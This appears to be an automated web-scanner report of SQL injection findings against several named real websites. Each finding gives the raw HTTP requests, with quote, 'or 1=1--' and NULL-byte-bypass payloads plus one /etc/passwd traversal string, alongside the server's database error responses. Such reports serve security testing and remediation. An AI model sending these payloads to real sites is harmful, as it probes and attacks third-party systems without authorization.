_G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"7_01_0_836281",IG:"152f82724007427dbb0aa7f8698534b7",EventID:"6C1547C0DA0F4E5597E01CAF67EF9A1F",P:"local",DA:"Bl2",SUIH:"gQVAkYKqHJOzp6-QDpl3dw",gpUrl:"\/fd\/ls\/GLinkPing.aspx?"};_G.lsUrl="/fd/ls/l?IG="+_G.IG;curUrl="http:\/\/www.bing.com\/local\/details.aspx";function si_T(a){if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+'IG='+_G.IG+a;}return true;};_w=window;_d=document;sb_de=_d.documentElement;sb_ie=!!_w.ActiveXObject;sb_i6=sb_ie&&!_w.XMLHttpRequest;function _ge(a){return _d.getElementById(a)}sb_st=_w.setTimeout;sb_ct=_w.clearTimeout;sb_gt=function(){return(new Date).getTime()};function si_PP(e,c){if(!_G.PPS){for(var d='"',b=["PC","FC","BC","BS","H","C1","C2","BP","KP"],a=0;a<b.length;a++)d+=',"'+b[a]+'":'+(_G[b[a]+"T"]?_G[b[a]+"T"]-_G.ST:-1);_G.PPImg=new Image;_G.PPImg.src=_G.lsUrl+'&Type=Event.CPT&DATA={"pp":{"S":"'+(c?c:"L")+d+',"CT":'+(e-_G.ST)+',"IL":'+_d.images.length+(_w.sb_ppCPL?',"CP":1':"")+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:"");_G.PPS=1;sb_st(function(){sj_evt.fire("onPP")},1)}}_w.onbeforeunload=function(){si_PP(new Date,"A")};sj_evt=new function(){var a={},b=this;function c(b){return a[b]||(a[b]=[])}b.fire=function(e){for(var a=c(e),d=a.e=arguments,b=0;b<a.length;b++)if(a[b].d)sb_st(sj_wf(a[b],d),a[b].d);else a[b](d)};b.bind=function(f,a,d,e){var b=c(f);a.d=e;b.push(a);d&&b.e&&a(b.e)};b.unbind=function(e,d){for(var c=0,b=a[e];b&&c<b.length;c++)if(b[c]==d){b.splice(c,1);break}}};
//]]></script><link rel="stylesheet" href="/fd/sa/0113225403/brand4_c.css" type="text/css"/><style type="text/css">#sw_im{filter: ;opacity:1;background-image:url(/fd/hpk2/Numbat_EN-US1348429100o.jpg)}</style><script type="text/javascript" src="/fd/sa/1124061903/Shared.js"></script><script type="text/javascript">//<![CDATA[
Log=new function(){var f=this,a=escape,h="length",g="indexOf",i="apply",j=2e3,e=a("["),d=0,k=0,c,l="",m=_G.lsUrl+"&TYPE=Event.ClientInst&DATA=",n=location.hostname.match(/([^.]+\.[^.]*)$/);if(n)l="http://a4."+n[0];f.ping=new Image;f.Log=function(d,e,
...[SNIP]...

Request 2

GET /local/details.aspx?lid=YN786x143652687&qt=yp&what=8034286771&where=Washington%2c+District+of+Columbia&s_cid=ansPhBkYp02&mkt=en-us&q=8034286771&FORM=LARE HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=8034286771&go=&form=QBRE&qs=n&sk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689'%20and%201%3d2--%20; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _FP=BDCE=129432394472338527&BDCEH=8D8DA4372A34906CD86E2A002A63F9CC; _HOP=; RMS=F=O&A=SAAAAAAAAQ; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437&bIm=556&hIm=100

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Feb 2011 02:21:39 GMT
Last-Modified: Sat, 26 Feb 2011 00:21:39 GMT
X-BM-TraceID: 330306a394a243af8e4e4708336e90bf
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:21:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=d9205741bfd74ee0a583a9861832d384; path=/local
Set-Cookie: CID=4b7e5696088d40a09afe6db564f0bffb; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/26/2011 12:21:38 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Content-Length: 282568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns = "http://www.w3.org/1999/xhtml" xmlns:web = "http://schema
...[SNIP]...
<![CDATA[
_G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"7_01_0_836281",IG:"cb31e2517e3249c199bc1fb6209d5260",EventID:"330306A394A243AF8E4E4708336E90BF",P:"local",DA:"Bl2",SUIH:"gQVAkYKqHJOzp6-QDpl3dw",gpUrl:"\/fd\/ls\/GLinkPing.aspx?"};_G.lsUrl="/fd/ls/l?IG="+_G.IG;curUrl="http:\/\/www.bing.com\/local\/details.aspx";function si_T(a){if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+'IG='+_G.IG+a;}return true;};_w=window;_d=document;sb_de=_d.documentElement;sb_ie=!!_w.ActiveXObject;sb_i6=sb_ie&&!_w.XMLHttpRequest;function _ge(a){return _d.getElementById(a)}sb_st=_w.setTimeout;sb_ct=_w.clearTimeout;sb_gt=function(){return(new Date).getTime()};function si_PP(e,c){if(!_G.PPS){for(var d='"',b=["PC","FC","BC","BS","H","C1","C2","BP","KP"],a=0;a<b.length;a++)d+=',"'+b[a]+'":'+(_G[b[a]+"T"]?_G[b[a]+"T"]-_G.ST:-1);_G.PPImg=new Image;_G.PPImg.src=_G.lsUrl+'&Type=Event.CPT&DATA={"pp":{"S":"'+(c?c:"L")+d+',"CT":'+(e-_G.ST)+',"IL":'+_d.images.length+(_w.sb_ppCPL?',"CP":1':"")+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:"");_G.PPS=1;sb_st(function(){sj_evt.fire("onPP")},1)}}_w.onbeforeunload=function(){si_PP(new Date,"A")};sj_evt=new function(){var a={},b=this;function c(b){return a[b]||(a[b]=[])}b.fire=function(e){for(var a=c(e),d=a.e=arguments,b=0;b<a.length;b++)if(a[b].d)sb_st(sj_wf(a[b],d),a[b].d);else a[b](d)};b.bind=function(f,a,d,e){var b=c(f);a.d=e;b.push(a);d&&b.e&&a(b.e)};b.unbind=function(e,d){for(var c=0,b=a[e];b&&c<b.length;c++)if(b[c]==d){b.splice(c,1);break}}};
//]]></script><link rel="stylesheet" href="/fd/sa/0113225403/brand4_c.css" type="text/css"/><style type="text/css">#sw_im{filter: ;opacity:1;background-image:url(/fd/hpk2/Numbat_EN-US1348429100o.jpg)}</style><script type="text/javascript" src="/fd/sa/1124061903/Shared.js"></script><script type="text/javascript">//<![CDATA[
Log=new function(){var f=this,a=escape,h="length",g="indexOf",i="apply",j=2e3,e=a("["),d=0,k=0,c,l="",m=_G.lsUrl+"&TYPE=Event.ClientInst&DATA=",n=location.hostname.match(/([^.]+\.[^.]*)$/);if(n)l="http://a4."+n[0];f.ping=new Image;f.Log=function(d,e,
...[SNIP]...

1.3. http://www.bizfind.us/cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 1668
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:13 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>NETSPARKER3FCA331E008F470991BCA348524BAFEB' popular categories
...[SNIP]...

Request 2

GET /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx'' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78135
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:15 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>NETSPARKER3FCA331E008F470991BCA348524BAFEB'' popular categorie
...[SNIP]...

1.4. http://www.caribbean-ocean.com/get-image.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=52652' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:17:55 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 934
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

1.5. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=5/1'2652 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:19:12 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 940
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'2652' at line 1<br /><br /><textarea rows="10" cols="100"
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

1.6. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 88463222%20or%201%3d1--%20 and 88463222%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=188463222%20or%201%3d1--%20 HTTP/1.1
Host: www.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwdviewAdJs&affiliateId=0&adSize=300x85
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; PHPSESSID=mi664gpt9tqqr7tr4l2q1o0pe1; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:23:47 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 20591
X-Varnish: 303269691
Expires: Thu, 21 Apr 2011 01:23:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:23:51 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' style='color:white' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' style='color:white' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp;
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=188463222%20or%201%3d2--%20 HTTP/1.1
Host: www.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwdviewAdJs&affiliateId=0&adSize=300x85
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; PHPSESSID=mi664gpt9tqqr7tr4l2q1o0pe1; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:23:52 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 1968
X-Varnish: 303269764
Expires: Thu, 21 Apr 2011 01:23:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:23:52 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a href='http://fashion.glam.com/feed/' target='_blank'><div class='_glam_search_rss'></div></a> </ul> </div> </div><div class='homehorizontalBorder'></div>";

document.write(string)

1.7. http://www.insideup.com/wiki/index.php [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /wiki/index.php

Issue detail

The action parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the action parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wiki/index.php?title=-&action=raw'&gen=js&useskin=monobook HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.insideup.com
Cookie: OAID=5970e1167121a2363c810f601c8e5f51; PHPSESSID=7o85u69j279gjuu7r5rl5e0lu6

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:45:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
           FROM category cat, sub_category subcat
                                   WHERE cat.category_id = subcat.category_id
                                   AND LOWER(subcat.sub_category_name) = 'index.php?title=-&action=raw'&gen=js&useskin=monobook' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5

1.8. http://www.insideup.com/wiki/index.php [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /wiki/index.php

Issue detail

The title parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the title parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/index.php?title=MediaWiki:Monobook.css%00'&usemsgcache=yes&action=raw&ctype=text/css&smaxage=18000 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.insideup.com
Cookie: OAID=5970e1167121a2363c810f601c8e5f51; PHPSESSID=7o85u69j279gjuu7r5rl5e0lu6

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:44:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
                               WHERE cat.category_id = subcat.category_id
                                   AND LOWER(subcat.sub_category_name) = 'index.php?title=mediawiki:monobook.css%00'&usemsgcache=yes&action=raw&ctype=text/css&smaxage=18000' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5

1.9. http://www.komonews.com/obits/ [chid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.komonews.com
Path:   /obits/

Issue detail

The chid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the chid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /obits/?chid=directory' HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:15:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:15:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 47581

       
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<img src="http://media.komonews.com/images/68*69/flora-1.jpg" width="68" height="69" class="thumb" alt="" title="Orquieza, Flora" />
...[SNIP]...

1.10. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=23' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:29:22 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 1168

<!-- careers start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC
...[SNIP]...

1.11. http://www.quantcast.com/google.com [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.quantcast.com
Path:   /google.com

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /google.com;jsessionid=902C2D61E83AC8A548758F5A7FBE1018?country=US HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=474FF8A3747940CE0B8EDFC5B898F977; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; qcPageID=0; __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.4.8.1298496835385; __qca=P0-1138661367-1297862290557; qcVisitor=2|47|1297862270597|16|NOTSET;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F6238EBA188B9B06E60C1A2895758847; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 22:28:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

Request 2

GET /google.com;jsessionid=902C2D61E83AC8A548758F5A7FBE1018?country=US HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
